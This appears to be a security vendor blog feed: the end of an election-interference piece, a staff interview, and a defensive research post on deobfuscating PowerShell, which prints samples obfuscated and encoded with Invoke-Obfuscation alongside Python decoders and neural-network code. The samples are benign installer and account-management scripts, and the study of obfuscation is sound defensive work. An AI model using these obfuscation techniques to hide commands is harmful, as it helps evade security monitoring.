    While disinformation is one way of manipulating opinion prior to an election, internet service disruptions also aim to influence voter behavior. Back in 2010, Myanmar experienced a disruption that cut internet connectivity just days before its first election in 20 years. According to Freedom House, Zambia and Gambia each experienced internet service disruptions leading up to an election. Surrounding Mali's recent election, an internet advocacy group accused the government of intentionally disrupting access to limit communication and impede the activities of opponents. While these kinds of blackouts are less likely in countries with full internet penetration, it was only two years ago that the Mirai botnet took down internet connectivity in parts of the East Coast, as well as some social media sites. In 2016, an internet outage affecting close to a million Germans also sparked concerns over vulnerability to election interference. More recently, Brazil's upcoming presidential election has already triggered concerns that this tactic may be employed, as the government has previously blocked messaging apps.

     

    Looking Ahead

    For defenders of democratic integrity across the globe, one of the biggest failures in understanding election interference is a failure of imagination. For instance, prior to the 2016 Montenegrin parliamentary election, a coup plot was foiled that would have included hacking into messaging apps, spreading disinformation claiming the ruling party rigged the election, and using hired mercenaries to take advantage of the chaos to storm the Parliament building and assassinate the prime minister. While this is an extreme example, it is essential to consider the range of potential interference techniques and structure defenses accordingly.

    As website interference, data theft and manipulation, and narrative control become entrenched components of election interference, defenders must understand how these tactics can be mixed and matched for unprecedented impact. By looking globally at the various modes of interference, local and state campaigns can more proactively defend against potential digital attacks. The notion of 'hacking elections' must be replaced with a more nuanced comprehension of the various attack vectors and the potential attackers motivated to influence an election.

    At the same time, there are examples of successfully countering election interference. Twitter's new policy, with its more robust removal of bots and fake personas and its prohibition on disseminating hacked materials, may have incorporated insights from French election preparations. Only by looking globally can lessons learned inform election defenses and proactively protect against digital attacks on democratic institutions.

    Spotlight Interview: Ian McShane

    $
    0
    0

    New Endgamer, Ian McShane, sat down with us to answer a few questions about what led him here. Our discussion explored UX in security, avoiding the ‘one size fits all’ model, and what's next for him as our VP of Product Marketing. 

    Tell us about your new role

    Ian: I’ve been passionate about building and shipping great products for over a decade, and I’ve become especially interested in delivering the best user experience possible for security admins of all experience levels. I know firsthand from my practitioner days that the day-to-day UX can make or break a platform - and the person using it! At Endgame, I’m looking forward to helping organizations identify, understand, and solve their biggest endpoint security problems in a way that’s right for them.

    What are some of the biggest challenges facing IT leaders today?

    Ian: A lot has already been said about some of the most common organizational challenges - struggles with basic security principles like patch and vulnerability management, authentication and account protection, and system hardening. But one of the biggest challenges for a CISO or IT leader is the sheer scale of products and solutions available across the infosec industry. With so much work and so little time, many organizations have fallen for the “one size fits all” promises of vendors that offer products and solutions appearing - at first glance - to solve many problems with little to no configuration or ongoing administration.

    The reality is that each and every organization has its own unique requirements and unique ways of working that make “one size fits all” almost impossible. Moreover, it’s important to understand what skills and capabilities an organization has available to dedicate to new technologies and new processes. Discovering six months into a multi-year subscription that the product requires far more hands-on work than initially expected, or needs additional subscriptions or products to fully achieve value, is an expensive realization and one that can be very difficult to recover from.

    What do customers struggle with in relation to security?

    Ian: Until a few years ago the biggest issues always seemed to be budget related, but with more organizations realizing that they need to proactively invest in security, the real struggle has become staffing their security teams with experienced analysts. Back to what I said earlier, I’m passionate about the security admin user experience, and how vendors can improve a security administrator’s day-to-day work process has already become a key differentiator in a saturated market.

    Why did you choose Endgame?

    Ian: There’s so much to be excited about at Endgame, but the things that are important to me are people, culture, and obviously technology. Every person I met at Endgame was smart and engaging, and it was quickly evident that the company is passionate about the things that I find important - for example, a commitment to transparency, to investing in initiatives that help give back to our industry, and to help it grow through diversity and technical excellence.

    On the product side, we’re one of the few vendors that are really making a difference in the quality of life for security admins by providing advanced capabilities in ways that are easy to consume and that, frankly, work at a ridiculous scale.

     

    Ian recently joined Endgame as Vice President of Product Marketing. He formerly led the Gartner Magic Quadrant for Endpoint Protection Platforms as a security and risk management analyst.

    Deobfuscating PowerShell: Putting the Toothpaste Back in the Tube

    $
    0
    0

    One lesson that security professionals learn early on is that attackers don't like to make your job easy. They have a range of techniques to obfuscate location, network traffic, or raw code. This in turn makes it harder for defenders to detect and block what they can't find, or to understand something that is illegible. In the realm of coding, obfuscation means using the functions and quirks of the language to create a command that is easily machine readable but much harder for human eyes to recognize.

    Obfuscation techniques continue to advance, but fortunately defenders are becoming increasingly aware and developing complementary deobfuscation techniques. As I presented earlier this year at BSides Charm, there are some exciting ways to apply machine learning (ML) to combat PowerShell obfuscation. But before getting into some solutions, let’s take a look at a few common obfuscation techniques, specifically focusing on PowerShell use by attackers.  

     

    PowerShell Obfuscation by Attackers

    PowerShell is powerful. It was designed to automate tasks from the command line and handle configuration management, and many important tools have been built on it. The aspects that make PowerShell so effective - such as easy-to-import modules, access to core APIs, and remote commands - also make it one of the go-to tools for attackers to execute fileless attacks. Living off the land (using native or pre-installed tools to carry out a mission) has grown in popularity, at least partially due to advances in file-based AV systems, such as ML engines that detect never-before-seen attacks.

    Fortunately for analysts and defenders, PowerShell commands can be logged and script files can be captured for analysis. This gives us a chance to perform after-action forensics to see what the attacker was up to and if they were successful. Unfortunately, attackers don’t like making this easy, so they will often obfuscate and encode commands to deter and slow down analysts.

    Each language will have its own methods, many of which are shared, but for PowerShell some of the most common are:

    • Random case: some PowerShell variables and names are case insensitive, so their casing can be scrambled at will.

    • Splitting strings apart: the opposite of concatenate. This may or may not be a real word. Let's say it is.

    • String interpolation: typically used for inserting variables into command statements; in this case it's used to jumble string components.

    • Backticks: these can be used as a line continuation character and sometimes to signify a special character. But if you use a backtick in the middle of a variable, it "continues" the line to the next characters in the same line.

    • Converting a string into a command operation (for example, via Invoke-Expression or the call operator).

    • Whitespace insertion: whitespace is irrelevant in some operations, so adding it just makes reading harder.

    • Character encoding: replacing characters with their ASCII code representations.

    There are also more complicated obfuscations like Variable Creation and Replacement. This is where an obfuscator defines a random variable to stand in for all or part of a string and substitutes it in that string's place throughout the file. There are many ways to implement the replacement. Below are a couple of examples:

     

    Format Operator: https://ss64.com/ps/syntax-f-operator.html

    Input: ("{1}PSScriptRoot{0}..{0}PSVersionCompare.psd1" -F '\','$')

    Output: $PSScriptRoot\..\PSVersionCompare.psd1

     

    Replace Function: https://ss64.com/ps/replace.html

    Input: ('pZyPSScriptRoot\Add-LTUser.ps1').replace('pZy','$')

    Output: $PSScriptRoot\Add-LTUser.ps1
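    Patterns like this can be collapsed mechanically. Here is a rough Python sketch that handles only the simple case shown above (a single-quoted literal and an unnested replace call), purely for illustration:

    import re

    def resolve_replace(line):
        # match ('...').replace('old','new') and substitute the resolved literal
        pattern = r"\(\s*'([^']*)'\s*\)\.replace\(\s*'([^']*)'\s*,\s*'([^']*)'\s*\)"
        for m in list(re.finditer(pattern, line)):
            body, old, new = m.group(1), m.group(2), m.group(3)
            line = line.replace(m.group(0), "'" + body.replace(old, new) + "'")
        return line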

     

    There are more examples that we won’t get into, but it’s a finite list so all these are solvable.

    All of these methods and more are made easily accessible with Daniel Bohannon’s Invoke-Obfuscation module. It was our go-to source for all obfuscation and encoding work in our research.

    Using Invoke-Obfuscation, we can employ multiple obfuscations at once, for example:

    Before:

    $packageName = 'kvrt'
    $url = 'http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe'
    $checksum = '8f1de79beb31f1dbb8b83d14951d71d41bc10668d875531684143b04e271c362'
    $checksumType = 'sha256'
    $toolsPath = "$(Split-Path -parent $MyInvocation.MyCommand.Definition)"
    $installFile = Join-Path $toolsPath "kvrt.exe"
    try {
      Get-ChocolateyWebFile -PackageName "$packageName" `
                            -FileFullPath "$installFile" `
                            -Url "$url" `
                            -Checksum "$checksum" `
                            -ChecksumType "$checksumType"
    
      # create empty sidecars so shimgen only creates one shim
      Set-Content -Path ("$installFile.ignore") `
                  -Value $null
    
      # create batch to start executable
      $batchStart = Join-Path $toolsPath "kvrt.bat"
      'start %~dp0\kvrt.exe -accepteula' | Out-File -FilePath $batchStart -Encoding ASCII
      Install-BinFile "kvrt" "$batchStart"
    } catch {
      throw $_.Exception
    }
    
    Figure 1: Original Powershell Script Example

     

    After:

    ${P`ACka`Ge`NAMe} = ("{0}{1}" -f 'kv','rt')
    ${U`RL} = ("{4}{11}{0}{6}{10}{3}{7}{2}{13}{15}{1}{16}{5}{8}{9}{14}{12}"-f'persky-','il','com/dev','bs','http:/','/','l','.','KVR','T/late','a','/devbuilds.kas','T.exe','b','st/full/KVR','u','ds')
    ${Check`s`UM} = ("{15}{16}{10}{3}{11}{6}{14}{9}{4}{5}{13}{1}{8}{7}{12}{2}{0}"-f 'c362','84143b0','71','79beb31f1d','1','bc','495','e','4','d71d4','e','bb8b83d1','2','10668d8755316','1','8f','1d')
    ${C`HE`cksu`m`TYpe} = ("{1}{0}" -f'56','sha2')
    ${T`Ool`s`PATH} = "$(Split-Path -parent $MyInvocation.MyCommand.Definition) "
    ${instALL`F`i`Le} = .("{0}{2}{1}{3}" -f'J','-Pa','oin','th') ${tOO`lSP`ATh} ("{0}{1}{2}" -f 'k','vrt.e','xe')
    try {
      &("{2}{5}{0}{4}{3}{1}" -f'colateyWe','e','Ge','Fil','b','t-Cho') -PackageName "$packageName" `
                            -FileFullPath "$installFile" `
                            -Url "$url" `
                            -Checksum "$checksum" `
                            -ChecksumType "$checksumType"
      &("{2}{3}{0}{1}"-f '-','Content','Se','t') -Path ("$installFile.ignore") `
                  -Value ${nu`Ll}
    
      
      ${B`At`C`HSTart} = &("{0}{2}{1}{3}"-f 'J','i','o','n-Path') ${TOol`s`patH} ("{0}{2}{1}" -f 'k','.bat','vrt')
      ((("{1}{2}{3}{4}{5}{7}{0}{6}"-f'ce','start ','%','~dp0{0','}k','vrt','pteula','.exe -ac'))-f [CHar]92) | .("{0}{1}{2}"-f 'Out-','Fi','le') -FilePath ${BA`T`c`hstARt} -Encoding ("{0}{1}"-f 'AS','CII')
      &("{1}{0}{3}{2}"-f'l-','Instal','nFile','Bi') ("{0}{1}"-f 'k','vrt') "$batchStart"
    } catch {
      throw ${_}."E`X`CEPtiOn"
    }
    
    
    Figure 2: Powershell Script Example after Obfuscation via Invoke-Obfuscation

     

    Encoding Techniques

    Text can also be converted into other character mapping schemes to further obfuscate it. In this analysis we've only concerned ourselves with two schemes: ASCII to hex and ASCII to decimal. For example, 'A' maps to '41' in hex and '65' in decimal, while '[' maps to '5B' in hex and '91' in decimal.
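    These mappings are easy to sanity check from a Python prompt:

    >>> format(ord('A'), 'X'), str(ord('A'))
    ('41', '65')
    >>> format(ord('['), 'X'), str(ord('['))
    ('5B', '91')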

    Fully encoding a script in PowerShell requires some additional logic the interpreter can use to decode the text. An example script encoded to a decimal representation is shown below.

    You might notice that even the logic used to decode the sequences is obfuscated in this example. Invoke-Obfuscation can really do a number on scripts.

    .((gET-varIAble '*MDR*').nAME[3,11,2]-JoiN'')([chAR[]] ( 36,112, 97, 99,107, 97 ,103, 101 , 78 , 97 ,109, 101 ,32 ,61 ,32 , 39 , 107 , 118,114 , 116 ,39 , 10 , 36 ,117 ,114 ,108 , 32 ,61 , 32,39,104 , 116, 116, 112,58,47 , 47 , 100 , 101 ,118, 98, 117 , 105, 108, 100 , 115,46, 107 , 97 , 115,112, 101,114,115, 107, 121,45,108,97, 98 , 115, 46 , 99 , 111 , 109 , 47, 100 ,101, 118 , 98 ,117,105, 108 , 100,115,47 ,75 , 86 ,82, 84,47 ,108 , 97, 116 ,101, 115 ,116,47 ,102 ,117, 108,108,47, 75 , 86,82 , 84 ,46, 101 ,120 ,101, 39, 10 , 36,99 , 104,101 ,99 , 107 ,115,117 , 109, 32 ,61,32, 39 , 56, 102, 49,100 ,101, 55,57 , 98, 101 , 98,51, 49 , 102,49, 100, 98 ,98,56,98 , 56,51,100, 49, 52, 57, 53 ,49,100,55, 49,100,52 , 49 , 98,99,49 ,48 , 54, 54, 56 , 100 , 56, 55, 53 ,53 , 51,49 , 54 , 56 , 52,49, 52 ,51 ,98, 48 , 52 , 101 ,50 , 55 , 49, 99 , 51 ,54, 50, 39 , 10 ,36, 99,104 , 101, 99 ,107, 115 ,117 , 109,84,121, 112, 101,32, 61,32 ,39, 115 , 104 , 97 , 50, 53,54 ,39 , 10 ,36 , 116 ,111 ,111 , 108 , 115, 80 ,97,116 ,104, 32, 61 , 32 ,34, 36,40 , 83 , 112 ,108, 105 , 116 , 45 , 80,97, 116 ,104, 32,45 ,112, 97 , 114 , 101, 110 ,116 ,32 , 36, 77 ,121 ,73 , 110, 118 ,111, 99 ,97, 116 , 105 ,111,110, 46, 77, 121 ,67 , 111,109, 109, 97, 110 , 100 ,46 , 68, 101 ,102,105 ,110, 105 , 116 , 105, 111, 110,41,34 ,10 , 36,105,110 , 115 , 116 , 97 ,108 ,108, 70 , 105, 108 ,101,32, 61 ,32, 74,111 , 105 ,110 ,45 , 80 ,97, 116, 104, 32 ,36, 116 , 111,111,108, 115 , 80 , 97,116,104,32 ,34,107, 118,114, 116 , 46,101,120,101, 34, 10, 116 , 114 , 121, 32,123 ,10 , 32,32, 71 ,101 , 116, 45, 67,104, 111 , 99 , 111 , 108,97, 116,101 , 121, 87, 101, 98, 70,105, 108,101 , 32 ,45 ,80, 97, 99,107,97, 103 , 101,78,97, 109, 101 , 32,34, 36, 112,97 ,99, 107, 97,103 , 101 , 78 , 97 , 109 ,101,34 , 32 , 96,10,32, 32,32 ,32 ,32 ,32,32,32 , 32, 32,32, 32 ,32,32, 32,32 , 32 ,32, 32 ,32 ,32, 32,32,32, 45,70,105 ,108 , 101, 70,117 , 108 ,108 ,80,97,116 ,104, 32, 34, 36,105 ,110 , 115 , 116 , 97,108, 108 , 70 ,105 ,108, 101 ,34, 32,96 ,10 , 32, 32,32 , 32 ,32,32,32 ,32 , 32,32, 32 ,32,32 , 32 , 32,32, 32,32 , 32, 32 ,32 ,32 , 32 ,32 ,45,85 , 114, 108, 32 , 34,36, 117, 114 , 108,34 ,32 ,96,10 , 32,32,32,32,32 , 32 , 32 ,32 ,32 ,32 ,32 ,32,32 , 32, 32,32 , 32,32, 32 ,32 ,32, 32 ,32 , 32,45,67 ,104 ,101, 99 , 107 , 115 , 117, 109 ,32 , 34 , 36 ,99,104,101, 99 , 107,115, 117 , 109 ,34,32, 96,10,32,32, 32 ,32, 32,32 ,32 , 32 , 32 ,32 , 32 , 32,32 , 32, 32, 32 ,32 ,32 , 32, 32 ,32, 32,32, 32,45,67,104 , 101 , 99 , 107,115 ,117 , 109 , 84 , 121 , 112, 101, 32 ,34,36, 99, 104,101, 99,107,115 , 117 , 109, 84, 121,112, 101, 34 , 10, 10, 32 ,32 , 35 , 32, 99 ,114 ,101 , 97 ,116 ,101 , 32 ,101,109, 112,116 , 121,32, 115 ,105 ,100 , 101 ,99 ,97, 114 ,115 ,32 ,115 ,111 ,32, 115 ,104 ,105 ,109,103 , 101 , 110 ,32,111 ,110,108 , 121,32,99 ,114 ,101 ,97 , 116 , 101, 115 , 32, 111 ,110 , 101 , 32,115 , 104 ,105 ,109, 10,32 , 32,83 , 101 , 116 , 45 ,67,111, 110 ,116 ,101,110 , 116, 32 ,45 ,80 , 97, 116 ,104, 32, 40 ,34,36,105,110, 115,116,97, 108,108, 70 ,105, 108,101 , 46 , 105 ,103, 110,111 , 114 , 101 , 34 ,41, 32, 96 , 10 , 32,32 , 32, 32,32 , 32,32 , 32, 32 ,32, 32,32,32 , 32 , 45,86,97, 108 ,117 ,101 , 32 , 36 , 110 , 117 , 108, 108 , 10, 10 ,32, 32, 35,32 , 99 , 114,101 , 97 ,116 ,101 , 32 , 98 ,97 ,116 , 99,104 , 32 ,116 , 111 ,32,115, 116, 97,114, 116, 32 , 101, 120 , 101 ,99 , 117 , 116, 97 ,98 , 108 ,101, 10,32 , 32 , 36 ,98 ,97, 116 , 99 , 104, 83,116, 97 ,114 , 116 ,32,61, 32 ,74,111,105, 110, 45, 80, 97, 116 , 104,32, 36 , 116 , 
111,111,108,115, 80,97 , 116,104,32 , 34 ,107 , 118, 114,116 , 46 , 98 ,97 , 116 , 34 ,10,32, 32 , 39,115 ,116,97 , 114, 116,32,37, 126,100, 112, 48 ,92, 107,118 ,114, 116, 46 , 101, 120,101 , 32 , 45 ,97, 99, 99 ,101 , 112 , 116 ,101 ,117 ,108, 97 ,39 , 32,124, 32 ,79 , 117, 116, 45,70, 105 , 108, 101 , 32 , 45, 70 ,105 ,108 ,101 ,80, 97 ,116,104, 32 ,36,98, 97, 116,99 ,104, 83 ,116, 97 ,114 , 116 ,32, 45 , 69, 110 , 99 ,111 , 100 , 105,110, 103 ,32 ,65 , 83,67, 73,73, 10 ,32, 32 ,73,110, 115, 116 ,97 , 108,108 , 45 , 66,105 , 110,70,105, 108 , 101 , 32,34 , 107,118 ,114, 116 , 34 , 32 ,34,36, 98 , 97 , 116, 99 , 104, 83 , 116 ,97, 114,116 ,34,10, 125 ,32 ,99,97 , 116,99,104 ,32, 123,10 , 32 , 32 ,116 , 104, 114 , 111 , 119 ,32 , 36 , 95, 46, 69 ,120 , 99, 101 ,112 ,116 ,105 ,111 , 110 , 10,125 )-jOIN'') 
    Figure 3: Powershell Script Example after Encoding via Invoke-Obfuscation

     

    How Do We Deobfuscate?

    To solve this problem, we created a series of operations to tackle each of the issues presented.

    First, we gathered data and built a classifier to determine if a sample is encoded, obfuscated, or plain text. Samples can be both obfuscated and encoded, so we’ll need to reuse this classifier to make sure our final product is complete. Then we iteratively applied decoding and deobfuscation logic, while checking the output of each application to see if more work is required. Finally, we implemented a cleanup neural network, a new approach to deobfuscation, to fix some of the odd bits of obfuscation that can’t be handled by simple logic alone.

    Figure 4: Deobfuscation Logic Flow

     

    Find What We're Working With

    Our first task is building something that can determine if a sample is encoded, obfuscated, or plain text. To that end, we built a machine learning classifier to automatically make that determination.

     

    Building a Status Classifier

    The typical machine learning approach for building and training classifiers is to:

    1. Gather lots of samples with labels (e.g. hex encoded, obfuscated, plain text)
    2. Generate numerical features on those samples
    3. Train using your selected algorithm

    Figure 5: Classifier Steps

     

    Often the hardest part of building a classifier is getting the samples and labels. For this problem, some solutions for finding samples include downloading from file sharing services or scraping GitHub. Luckily, once we have a corpus of PowerShell script samples, we can generate the obfuscated and encoded samples on demand with Invoke-Obfuscation!

    Next up is generating features for our samples. Text can be a little tricky for a classifier. The classical machine learning approach (e.g., training a logistic regression model) is to hand-define and generate summary statistics and other relevant features of your sample, such as:

    • # of characters
    • # of vowels
    • Entropy
    • # of ` marks
    • # of numbers

    However, these sorts of features often do not express the relationship between characters well.

    Instead, we're going to use a type of neural network called an LSTM.

    An LSTM (long short-term memory) network is a specialized RNN (recurrent neural network). These networks are useful because they retain a memory of previous states and use that in combination with the current input to determine the next state. Here is a good explanatory blog on what LSTMs are and how they operate, or see some of our own previous research into building an LSTM to detect domain generation algorithms.

    Figure 6: LSTM Diagram

     

    Getting started with neural networks can seem a little intimidating; however, high-level frameworks make the initial application very easy.

    from sklearn.model_selection import train_test_split
    from keras.models import Sequential
    from keras.layers import Embedding, LSTM, Dropout, Dense
    
    # hold out 20% of the labeled samples for validation
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20)
    
    model = Sequential()
    # map each character token to a dense vector before the recurrent layer
    model.add(Embedding(num_encoder_tokens, embedding_vector_length, input_length=sample_len))
    model.add(LSTM(100))
    model.add(Dropout(0.2))
    model.add(Dense(len(classes), activation='sigmoid'))  # one output per class label
    model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
    print(model.summary())
    model.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=epochs, batch_size=64)
    

    In just a handful of lines we can take our input data, create a simple network, and train it.

     

    Decoding

    Figure 7: Powershell Script Example after Encoding via Invoke-Obfuscation

     

    Decoding can be a relatively straightforward process if you have the encoding mappings and know when to apply the logic. This is exactly what the PowerShell interpreter does, and reimplementing that is a valid approach for the sample above.

    However, I'm first and foremost a data scientist, and I see a pattern here. You know what's good for patterns? Regex!

    import re

    # pull out each 1-3 digit decimal value, ignoring the trailing comma/space/paren
    ascii_char_reg = r'([0-9]{1,3})[, \)]+'
    ascii_chars = re.findall(ascii_char_reg, file_text)
    chars = [chr(int(ac)) for ac in ascii_chars]
    file_text = ''.join(chars)
    

    With a Regex-based solution we create a decoder in just a few lines of code. It is also robust to the encoder logic obfuscation at the beginning and end of the sample, and it can work outside of a PowerShell script, so it is generalizable.

     

    Deobfuscation

    The bulk of the deobfuscation can be handled by simple logic: concatenating strings, removing backticks, replacing variables, etc.

    Some of these transformations are easy:

    def remove_ticks(line):
        # strip backticks everywhere except the final character
        # (a trailing tick is a genuine line continuation)
        line = line[:-1].replace('`', '') + line[-1]
        return line
    

     

    def splatting(line):
        # collapse &('command') or &("command") invocations down to the command string itself
        splat_reg = r"""(&\( *['"]{1}(.+)?['"]{1} *?\))"""
        matches = re.findall(splat_reg, line)
        for match in matches:
            line = line.replace(match[0], match[1])
        return line
    

     

    def string_by_assign(line):
        # rewrite [string]Value casts as the quoted literal 'Value'
        match_reg = r'(?:(\[[sS][tT][rR][iI][nN][gG]\])([\[\]A-Za-z0-9]+)[\)\,\.]+)'
        matches = re.findall(match_reg, line)
        for match in matches:
            replace_str = match[0] + match[1]
            line = line.replace(replace_str, "'" + match[1] + "'")
        return line
    

     

    Some get a little more complicated. For reordering of strings based on '-f', the format operator, we do the following (a simplified sketch follows the list):

    1. Do char by char string processing to find either '-f' or '-F’
    2. Find all the {[0-9]+} type placeholders before the '-f’
    3. Find all the strings and valid non-string values after it
    4. Replace the placeholders with the values
    5. Iterate since you can do this multiple times in the same line.
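    Our implementation does this with character-by-character processing. For illustration only, a much simpler regex-based sketch handles the basic case (a double-quoted format string, single-quoted arguments, no nesting):

    import re

    def reorder_format_operator(line):
        # match ("{1}text{0}..." -f 'a','b') and substitute each {n} placeholder
        pattern = r"""\(\s*"([^"]*\{\d+\}[^"]*)"\s*-[fF]\s*((?:'[^']*'\s*,?\s*)+)\)"""
        for m in list(re.finditer(pattern, line)):
            fmt, args = m.group(1), m.group(2)
            values = re.findall(r"'([^']*)'", args)
            rebuilt = re.sub(r'\{(\d+)\}', lambda p: values[int(p.group(1))], fmt)
            line = line.replace(m.group(0), "'" + rebuilt + "'")
        return line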

    It's a little tedious, and there are multiple ways to do the same thing. But the list of techniques is finite, so it is definitely a solvable problem even if we didn't enumerate every solution in our implementation.

    After integrating all these deobfuscation techniques and applying them sequentially, we can see how well our code works.

    Before:

    param
    (
        [Parameter(MANdAtORy=${FA`L`SE})] ${dO`m`AiN} = ("{2}{1}{0}{3}" -f 'a','rtr','ai','n.com'),
        [Parameter(MandatOrY=${tr`UE})]  ${Sr`NUM`BER},
        [Parameter(mAnDATORY=${F`AL`SE})] ${targET`p`Ath} = ("{10}{11}{1}{2}{9}{14}{3}{12}{5}{7}{4}{0}{8}{13}{6}" -f'=a','=Airtr','a','ir',',DC','a','C=com','n','i','n','OU=Disab','led,OU','tr','rtran,D',' Users,OU=A'),
        [Parameter(ManDAtOrY=${T`RUe})]  ${us`er}
    )
    
    if (&("{2}{1}{0}"-f'Path','est-','T') ${US`eR})
    {
        ${USER`li`sT} = &("{0}{2}{3}{1}" -f'Ge','nt','t-','Conte') -Path ${u`SEr}
    }
    else
    {
        ${usER`L`ISt} = ${Us`Er}
    }
    
    ${c`oNT`AIneR} = ("{3}{11}{4}{8}{5}{0}{7}{10}{6}{2}{1}{9}" -f'ir','irtran,',',DC=a','OU','a',',OU=A','an','tran Users,OU=Air','bled','DC=com','tr','=Dis')
    ${D`eS`CrIP`TIon} = ('Term'+'ina'+'ted '+'per'+''+"$SrNumber")
    
    foreach (${uS`eR} in ${U`S`E`RList})
    {
        .("{2}{0}{1}" -f'et','-ADUser','S') -Identity ${Us`ER} -Server ${D`OM`AIN} -Enabled ${FA`LsE} -Description ${D`eSCrI`P`TION}
        ${UsE`RHan`dlE} = &("{2}{0}{1}"-f'U','ser','Get-AD') -Identity ${us`eR} -Server ${Do`M`AiN}
        &("{3}{1}{2}{0}" -f't','je','c','Move-ADOb') -Identity ${uSe`Rh`AnD`Le} -Server ${doM`A`In} -TargetPath ${C`O`Nt`Ainer}
    }
    
    Figure 8: Obfuscated Sample

     

    After:

    param
    (
        [Parameter(MANdAtORy=${FALSE})] ${dOmAiN} = "airtran.com",
        [Parameter(MandatOrY=${trUE})]  ${SrNUMBER},
        [Parameter(mAnDATORY=${FALSE})] ${targETpAth} = "OU=Disabled,OU=Airtran Users,OU=Airtran,DC=airtran,DC=com",
        [Parameter(ManDAtOrY=${TRUe})]  ${user}
    )
    if ("Test-Path" ${USeR})
    {
        ${USERlisT} = "Get-Content" -Path ${uSEr}
    }
    else
    {
        ${usERLISt} = ${UsEr}
    }
    ${coNTAIneR} = "OU=Disabled,OU=Airtran Users,OU=Airtran,DC=airtran,DC=com"
    ${DeSCrIPTIon} = ('Terminated per $SrNumber")
    foreach (${uSeR} in ${USERList})
    {
        "Set-ADUser" -Identity ${UsER} -Server ${DOMAIN} -Enabled ${FALsE} -Description ${DeSCrIPTION}
        ${UsERHandlE} = "Get-ADUser" -Identity ${useR} -Server ${DoMAiN}
        "Move-ADObject" -Identity ${uSeRhAnDLe} -Server ${doMAIn} -TargetPath ${CONtAiner}
    }
    
    Figure 9: Partially Deobfuscated Sample

     

    That’s not too bad! But a few errors remain, and most share a pattern and look like: (MAndatoRy=${fAlSe})] ${dOMAiN}

    This randomized casing is a different type of problem than we saw before. It makes the text harder to read, but not by applying PowerShell functions as obfuscation. While all of the previous techniques we've discussed could be run backwards to get the original input, randomized casing cannot. For this, we need a different technique.

     

    Reversing an Irreversible Function

    This is where things get interesting. To take this one step further we’re going to use a neural network to learn, and sometimes memorize, what variables are supposed to look like.

    If you were presented with the example:

    MOdULEDiRectORy

    based on your knowledge of English and programming, you could probably figure out a configuration of casing that makes sense. Perhaps one of these:

    ModuleDirectory

    moduleDirectory

    moduledirectory

    To mimic this cognition, we are going to train a Seq2Seq network. Seq2Seq stands for sequence to sequence. It’s a type of network (or networks) that is often used in machine translation.

    Seq2Seq uses LSTMs (see our text classifier earlier) to create an encoder network to transform the starting text, and a decoder network to use the encoder output and the decoder memory. Combining these we are able to feed the input character by character and predict the output. Keras has a nice blog explaining how to create and train one of these networks. Our code generally follows their example.
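    For reference, the core of such a character-level encoder-decoder looks roughly like the following. The dimensions are placeholder values, and the layout follows the Keras example rather than our exact code:

    from keras.models import Model
    from keras.layers import Input, LSTM, Dense

    num_tokens, latent_dim = 96, 256               # placeholder vocabulary and state sizes

    # encoder: consume the obfuscated word and keep only its final LSTM state
    encoder_inputs = Input(shape=(None, num_tokens))
    _, state_h, state_c = LSTM(latent_dim, return_state=True)(encoder_inputs)

    # decoder: emit the cleaned-up word one character at a time, seeded with the encoder state
    decoder_inputs = Input(shape=(None, num_tokens))
    decoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)
    decoder_outputs, _, _ = decoder_lstm(decoder_inputs, initial_state=[state_h, state_c])
    decoder_outputs = Dense(num_tokens, activation='softmax')(decoder_outputs)

    model = Model([encoder_inputs, decoder_inputs], decoder_outputs)
    model.compile(optimizer='rmsprop', loss='categorical_crossentropy')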

    We initially tried to use this network to translate entire lines. Since a Seq2Seq network builds the output character by character based on the input characters and the last predicted output characters, we can see how the text progresses along with the input. It started out well:

    Input:

    Becomes (looking good):

    Then (starting to error):

    Then finally (way off the rails):

    Once bad predictions start, they can get out of hand.

    To deal with bad predictions we constrained the problem and picked "words" in each line to consider.

    1. Find the corresponding words in the obf and non-obf files
    2. Grab most variables and keywords that can be random case obfuscated
    3. Use the obf word as input and non-obf word as desired output
    4. Predict the next char using the previous predictions and new input data

    The retrained network had some fun quirks:

    But in general performed quite nicely:

     

    Putting It All Together

    Now that we have a File Status Classifier, a Decoder, a Deobfuscator, and a Cleanup Network, we’re ready to package it all together into one function and test it out.

    Again, our steps are as follows:

    Figure 10: Deobfuscation Logic Flow
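    A minimal sketch of that wrapper function might look like the following, where classify(), decode(), deobfuscate(), and cleanup_network() are placeholder names for the components above rather than our actual API:

    def process(script_text, max_passes=10):
        # keep decoding/deobfuscating until the classifier says the text is plain
        for _ in range(max_passes):
            status = classify(script_text)           # 'encoded', 'obfuscated', or 'plain text'
            if status == 'encoded':
                script_text = decode(script_text)
            elif status == 'obfuscated':
                script_text = deobfuscate(script_text)
            else:
                break
        partially_fixed = script_text
        fully_fixed = cleanup_network(script_text)   # experimental random-case cleanup
        return partially_fixed, fully_fixed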

     

    Let's start with a non-obfuscated file:

    param
    (
        [Parameter(Mandatory=$false)] $Domain = 'airtran.com',
        [Parameter(Mandatory=$true)]  $SrNumber,
        [Parameter(Mandatory=$false)] $TargetPath = 'OU=Disabled,OU=Airtran Users,OU=Airtran,DC=airtran,DC=com',
        [Parameter(Mandatory=$true)]  $User
    )
    
    if (Test-Path $User)
    {
        $UserList = Get-Content -Path $User
    }
    else
    {
        $UserList = $User
    }
    
    $Container = 'OU=Disabled,OU=Airtran Users,OU=Airtran,DC=airtran,DC=com'
    $Description = "Terminated per $SrNumber"
    
    foreach ($User in $UserList)
    {
        Set-ADUser -Identity $User -Server $Domain -Enabled $false -Description $Description
        $UserHandle = Get-ADUser -Identity $User -Server $Domain
        Move-ADObject -Identity $UserHandle -Server $Domain -TargetPath $Container
    }
    
    Figure 11: Original Sample

     

    We obfuscate it using a random set of techniques:

    param
    (
        [Parameter(MANdAtORy=${FA`L`SE})] ${dO`m`AiN} = ("{2}{1}{0}{3}" -f 'a','rtr','ai','n.com'),
        [Parameter(MandatOrY=${tr`UE})]  ${Sr`NUM`BER},
        [Parameter(mAnDATORY=${F`AL`SE})] ${targET`p`Ath} = ("{10}{11}{1}{2}{9}{14}{3}{12}{5}{7}{4}{0}{8}{13}{6}" -f'=a','=Airtr','a','ir',',DC','a','C=com','n','i','n','OU=Disab','led,OU','tr','rtran,D',' Users,OU=A'),
        [Parameter(ManDAtOrY=${T`RUe})]  ${us`er}
    )
    
    if (&("{2}{1}{0}"-f'Path','est-','T') ${US`eR})
    {
